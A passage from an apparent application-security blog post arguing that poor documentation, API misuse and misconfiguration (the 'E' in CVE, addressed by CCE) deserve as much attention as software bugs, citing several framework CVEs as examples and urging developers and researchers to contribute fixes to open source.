On the contrary, poor documentation and negligence are silent threats. You won't find as many blog posts or security advisories talking about 'insecure' API usage or misconfigurations.
For instance, everyone in the security community uses the CVE acronym, but just a few folks know what CCE stands for (btw, it's Common Configuration Enumeration).

Since the very first days, the CVE Editorial Board has recognized the need to address both software flaws (aka vulnerabilities) and mis-configurations (aka exposures). The CCE project is the logical next step in the evolution of CVE, finally addressing the 'E' in CVE.

To reinforce my point, let's think together about real-life examples for each category:
  1. Frameworks are not immune to bugs. Apache Struts and the countless OGNL expression code execution bugs (CVE-2014-0094, CVE-2013-2251, CVE-2013-2135, CVE-2013-2134, CVE-2012-0838, ...), Ruby's Action Pack parsing flaw (CVE-2013-0156), Spring's Expression Language injection (CVE-2011-2730), PHP Laravel's cookie forgery to RCE, ... and many others. Just a few examples off the top of my head.
  2. Poor or inconsistent documentation. Scrypt API misuse, ... what else? ... PHP htmlspecialchars.
  3. Negligence. Ruby Mass Assignment, Java SecureRandom, ... it's getting hard.


It's up to us, the community.

Improving application security is not just discovering and fixing security bugs. It's making sure that we have the right foundations and that we build secure software on top of them. We need to trust our tools and know how to use them.

Collaboration and open source are crucial to winning this game. As GitHub has successfully demonstrated, code collaboration is fertile ground. Encouraging code review and transparency creates opportunities for developers and the security community to improve code quality and other software development artifacts - including documentation.

Inspire your company to contribute back to the open-source projects on which you rely. As a developer, spend time crafting easy-to-use APIs accompanied by clear documentation. If you're a security researcher, don't stop after you discover a bug: submit a patch and help the project prevent similar issues. Small things can really make a difference.